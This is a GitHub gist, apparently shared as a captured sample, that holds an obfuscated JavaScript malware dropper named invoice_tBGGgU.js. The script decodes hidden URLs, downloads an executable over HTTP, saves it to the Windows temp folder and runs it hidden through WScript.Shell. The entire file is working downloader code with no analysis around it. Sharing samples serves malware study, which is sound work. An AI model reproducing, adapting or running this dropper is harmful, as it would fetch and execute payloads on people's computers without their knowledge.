Skip to content

Instantly share code, notes, and snippets.

@danieltroger

danieltroger/invoice_tBGGgU.js

Created March 9, 2016 15:45
Show Gist options
  • Save danieltroger/8080a76239578eff723d to your computer and use it in GitHub Desktop.
Save danieltroger/8080a76239578eff723d to your computer and use it in GitHub Desktop.
Download ZIP
Some random malware I got
Raw
invoice_tBGGgU.js
function GDJvKNgkK(IVJATbrecnP) {
var oDgcGZJJ = "zgOl Ws WEnYBJh cri pt.S XUVMLD he ImdStDRD ll".split(" ");
var axxiqztP = XLiR(oDgcGZJJ[339-338] + oDgcGZJJ[532-529] + oDgcGZJJ[587-583] + oDgcGZJJ[489-483] + oDgcGZJJ[735-727]);
axxiqztP.Run(IVJATbrecnP, 0x1, 0x0);
}
function FxgXgJnDy(kJSXY,fRlhz,xWgZw,uOcD) {
var owDBH = "yhkOyO YRi pt.Shell kqErXrv Scri %TE MP% \\".split(" ");
var Cea=((1)?"W" + owDBH[4]:"")+owDBH[2];
var yM = WScript.CreateObject(Cea);
return yM.ExpandEnvironmentStrings(owDBH[6]+owDBH[7]+owDBH[8]);
}
function jjYEvMpG() {
var nRoikBR = "Sc PqtHlZM r rxtcrqogw ipting pMqlYUA fLf ile yAzxMbsITlnqWY System eM chaej Obj fxjNva ect KjPRgnM".split(" ");
return nRoikBR[0] + nRoikBR[2] + nRoikBR[4] + ".F" + nRoikBR[7] + nRoikBR[9] + nRoikBR[12] + nRoikBR[14];
}
function XLiR(NXDMU) {
yMsNDiK = WScript.CreateObject(NXDMU);
return yMsNDiK
}
function qGie(tMyCJ,qtvfT) {
tMyCJ.write(qtvfT);
}
function GNLG(FnciB) {
FnciB.open();
}
function moNK(yHxrE,UDTsa) {
yHxrE.saveToFile(UDTsa,286-284);
}
function eGWY(WkvVg,eBzDD,cvAaG) {
WkvVg.open(cvAaG,eBzDD,false);
}
function BFzF(aqiDi) {
if (aqiDi == 596-396){return true;} else {return false;}
}
function JupA(rzMoO) {
if (rzMoO > 183085-959){return true;} else {return false;}
}
function BBCC(tZMzA) {
var bITyQ="";
q=(779-779);
while(true) {
if (q >= tZMzA.length) {break;}
if (q % (669-667) != (797-797)) {
bITyQ += tZMzA.substring(q, q+(696-695));
}
q++;
}
return bITyQ;
}
function oGxY(dnYoO) {
var AMFDhezx=["\x73\x65\x6E\x64"];
dnYoO[AMFDhezx[0]]();
}
function KYDG(joofF) {
return joofF.status;
}
function dxACh(KNoMET) {
return new ActiveXObject(KNoMET);
}
function wMNyKCV(hMFT) {
hMFT.position=0;
}
function uKaxitc(tUEc) {
return tUEc.responseBody;
}
function tTYEkUno(OgE) {
return OgE.size;
}
var jg="whko6w9azrHeCyiowuuqnq5.xcWoPmD/86q9WejU4tqUU?w ogro6okgklNei.0cnoFmM/U6d9KeIUMtOUR?r f?K a?R e?";
var kX = BBCC(jg).split(" ");
var YZBXGg = ". DIMIre e PnojpAzB xe eUtU".split(" ");
var O = [kX[0].replace(new RegExp(YZBXGg[5],'g'), YZBXGg[0]+YZBXGg[2]+YZBXGg[4]),kX[1].replace(new RegExp(YZBXGg[5],'g'), YZBXGg[0]+YZBXGg[2]+YZBXGg[4]),kX[2].replace(new RegExp(YZBXGg[5],'g'), YZBXGg[0]+YZBXGg[2]+YZBXGg[4]),kX[3].replace(new RegExp(YZBXGg[5],'g'), YZBXGg[0]+YZBXGg[2]+YZBXGg[4]),kX[4].replace(new RegExp(YZBXGg[5],'g'), YZBXGg[0]+YZBXGg[2]+YZBXGg[4])];
var kuI = FxgXgJnDy("JkbE","uCbhz","OovgZU","qsUjxoa");
var QrA = dxACh(jjYEvMpG());
var fHuQLv = ("dYFjTAa \\").split(" ");
var fQKx = kuI+fHuQLv[0]+fHuQLv[1];
try{
QrA.CreateFolder(fQKx);
}catch(PMPYQL){
};
var Tji = ("2.XMLHTTP YlxnxXN ziTlk XML ream St oswdGdHk AD efxntFr O ZMcF D").split(" ");
var kF = true , TwHZ = Tji[7] + Tji[9] + Tji[11];
var Fx = XLiR("MS"+Tji[3]+(629189, Tji[0]));
var DUF = XLiR(TwHZ + "B." + Tji[5]+(427997, Tji[4]));
var NjB = 0;
var x = 1;
var wvHeGWp = 782965;
var M=NjB;
while (true) {
if(M>=O.length) {break;}
var yl = 0;
var HUH = ("ht" + " MwnFQVx tp DdyOv dqWpRXmx :// SiiElNI .e YQbFB x lhaXqF e G xScbqSy E gujzyrwE T").split(" ");
try {
var VndyM=HUH[233-233]+HUH[927-925]+HUH[902-897];
eGWY(Fx,VndyM+O[M]+x, HUH[12]+HUH[14]+HUH[16]); oGxY(Fx); if (BFzF(KYDG(Fx))) {
GNLG(DUF); DUF.type = 1; qGie(DUF,uKaxitc(Fx)); if (JupA(tTYEkUno(DUF))) {
yl = 1;DUF.position=(257-257);moNK(DUF,/*2cYE52Zk8C*/fQKx/*2Sme12GwIn*/+wvHeGWp+HUH[7]+HUH[9]+HUH[11]); try {
if (366>44) {
GDJvKNgkK(fQKx+wvHeGWp+/*R1Rd89ZyE5*/HUH[7]+HUH[9]+HUH[11]/*33cm91ObDD*/);
break;
}
}
catch (Qh) {
};
}; DUF.close();
};
if (yl == 1) {
NjB = M; break;
};
}
catch (Qh) {
};
M++;
};
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment